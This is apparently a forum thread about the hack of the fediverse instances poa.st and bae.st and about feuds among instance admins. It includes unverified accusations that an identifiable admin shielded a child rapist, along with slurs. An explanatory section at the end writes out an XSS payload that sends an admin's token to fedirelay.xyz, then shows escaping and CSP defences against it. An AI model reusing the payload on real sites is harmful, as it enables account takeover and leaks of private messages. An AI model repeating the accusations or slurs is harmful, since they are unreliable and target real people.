Oopsie whoopsie, someone did a little fricky wucky and admitted to protecting a known p-do on their fediverse instance, poa.st

Bottom Text

For context, one of my favorite people on the fediverse who I don't understand at all is bot. She's active on http://seal.cafe currently (hosted by friend of the site & cat enjoyer @kroner), and is constantly getting into fights with lots of people about random issues; I enjoy these even without context because I'm a fan of incendiary rhetoric and bot is a world class shit talker who also seems to feel strongly about the things she chooses to argue about.

If you don't take my word for it, here's a snapshot of recent box posts

https://i.rdrama.net/images/16850802876566367.webp

You might have seen that http://poa.st and http://bae.st, two popular instances on the free speech zone of the fediverse got hacked recently. We had a small thread here that didn't get the attention it deserved but there's a lot of rightoid seethe going on. Reminder that http://rdrama.cc is still the best instance that has all the marseys and has never been hacked; shout out @nekobit. If you remember the http://chudbuds.lol hack/leak, you'll know that private messages sent on the fediverse/Activity Pub are not end-to-end encrypted, so naturally lots of alt-tech wannabe e-celebs got their DMs leaked from this. For further context, graf is the admin/owner of http://poa.st who has recently feuded with Null and Crunklord420, over some dumb shit (watch MATI from 3 weeks ago if you want some context); he also defederated http://rdrama.cc over a meme nose emoji that he called doxing his admin (his admin runs a lolicon posting instance and also had a falling out with graf, so the image isn't doxing anymore but http://rdrama.cc is still blocked because he's a b-word)

So here's the meat. Box has been posting about s*x pests that use http://poa.st for well over a year at this point. As with many posts of someone claiming someone else on the internet is a s*x-pest, I was initially credulous, until this leak came out in which graf goes to bat for a guy who he says admitted to raping a minor to him directly. You could potentially get away with just staying silent on this issue, in my eyes, especially if you're wearing the mask of a free speech extremist alt-tech nerd, but graf is not that. He blocked http://rdrama.cc initially from sending any information to his instance, and later blocked both sent and received information from our instance to his. He blocked http://kiwifarms.cc under the pretense that http://kf.cc allowed cp on its servers, despite the fact that the 3rd party instance he claimed was the source of this cp had the policy set against it on the http://kf.cc server as it did on http://poa.st. Null sperging on the graf question about a month ago here.

Onion link for anyone who wants to explore more because kiwi farms is powered by a cat on one of those big wheels where they can run if they feel like it

https://i.rdrama.net/images/16850802878141081.webp

I have done my journ*listic duty and asked bot about this revelation, the response was incredibly keyed

https://i.rdrama.net/images/16850802881319487.webp

TLDR: Graf is homosexual (bad kind). Bot @ http://seal.cafe is vindicated. I am always right about fediverse tyrants being r-slur autists. Crunklord420 keeps being based and Terrypilled.

@Aevann, IDK if this is enough of a rightoid exposé to qualify for grant marseybux, but I love you

Someone remind me to pin award this in the morning so that people see this because I have to spend some marsey bux and also this is good drama. k thanks


https://i.rdrama.net/images/17092367509484937.webp https://i.rdrama.net/images/17093267613293715.webp https://i.rdrama.net/images/1711210096745272.webp


Everyone involved in this is turbo online and should close their laptops and move to a monastery ASAP

@nekobit is cool tho, keep up the terminal illness


thanks :hapyday:

i applied some apache mitigations but apparently there are other potential vulnerabilities.

I'm probably going to search for vulnerabilities with trial and error then report them to ensure nothing happens.


so how does the vuln work exactly? like user uploads poz.js to your server then real user runs poz.js client side and it posts their dms to http://fedirelay.xyz or is it serverside?


it's a little :marseymanlet: sophisticated, don't think :marseybigbussyhunterlove: anyone has figured out what exactly ran the script (seems like reports were vulnerable when opened on the admin :marseymoplicker: panel but don't know if that was the one used to hack http://poa.st and http://bae.st)

what the hackers actually :marseyakshually: got was the user's token, once they got a token :marseybadgejewgold: from an admin :marseycarpflorist: they could access :marsey403: the admin :marseymoplicker: panel where :marseydrama: all dms are easily visible (then made a simple :marseysmug4: script to scrape them)

the tokens were encoded and sent to http://fedirelay.xyz in a very very fancy way that i barely understand and couldn't hope to explain

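The reply above describes the shape of the attack (something runs a script in an admin's browser, the script grabs the admin's token, the token is sent to http://fedirelay.xyz, and the admin panel is then used to read DMs) without pinning down what actually triggered it. The block below is an added illustration of that generic mechanism, not code from the thread, from poa.st, or from any fediverse software: it assumes a stored-XSS style vector where a user-submitted report body is dropped into the admin panel's markup unescaped, assumes the token lives in localStorage under the key `token`, and uses a constructed report string and a made-up relay path. It shows the unsafe rendering next to the escaped rendering, a crude check for active content in rendered markup, and a Content-Security-Policy whose `connect-src` would refuse the exfil `fetch()` even if escaping were missed.

```javascript
// Added example, not part of the original thread. The report text, the
// localStorage key "token" and the relay URL path are all assumptions.

// Exfil host named in the thread; the path is made up for the example.
const assumedRelay = "https://fedirelay.xyz/collect";

// Constructed attacker-controlled report body: a broken <img> whose onerror
// handler reads the admin's token and ships it off-site.
const maliciousReport =
  'nice instance <img src=x onerror="fetch(\'' + assumedRelay +
  "?t='+encodeURIComponent(localStorage.getItem('token')))\">";

// Escape the five characters that matter inside HTML text and attributes.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable rendering: the report body is concatenated straight into markup,
// so the <img onerror=...> tag is live when the admin opens the panel.
function renderReportUnsafe(report) {
  return `<div class="report"><p>${report}</p></div>`;
}

// Hardened rendering: the body is escaped, so the browser shows the payload
// as text instead of parsing it as a tag.
function renderReportSafe(report) {
  return `<div class="report"><p>${escapeHtml(report)}</p></div>`;
}

// Crude detector for active content that survived into rendered markup:
// a <script> tag, an on* handler inside a real tag, or a javascript: URL.
function hasActiveContent(html) {
  return /<\s*script\b|<[a-z][^>]*\son[a-z]+\s*=|javascript:/i.test(html);
}

// Defence in depth: a CSP that only lets scripts talk back to the same
// origin. The exfil fetch() to the relay is refused by the browser.
const cspHeader =
  "default-src 'self'; script-src 'self'; connect-src 'self'; img-src 'self' data:";

// Minimal check of whether a CSP permits a fetch()/XHR to `origin`.
// Handles the connect-src -> default-src fallback; ignores wildcards with
// schemes and other CSP subtleties (simplified on purpose).
function cspAllowsConnect(csp, origin) {
  const pick = (name) => {
    const m = csp.match(new RegExp(`(?:^|;)\\s*${name}\\s+([^;]+)`));
    return m ? m[1].trim().split(/\s+/) : null;
  };
  const sources = pick("connect-src") || pick("default-src");
  if (!sources) return true; // no restriction at all
  return sources.includes(origin) || sources.includes("*");
}

// Stand-alone demo.
console.log("unsafe live?", hasActiveContent(renderReportUnsafe(maliciousReport)));
console.log("safe live?  ", hasActiveContent(renderReportSafe(maliciousReport)));
console.log("CSP lets fetch reach relay?",
  cspAllowsConnect(cspHeader, "https://fedirelay.xyz"));
```

The escaping fixes the rendering bug; the CSP is the layer that would have stopped the token from leaving the browser even with the rendering bug still present, which is why a practitioner wants both. Keeping the session token in an HttpOnly cookie rather than localStorage would remove the `localStorage.getItem` step entirely, but that is an architectural change rather than something this snippet can show.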
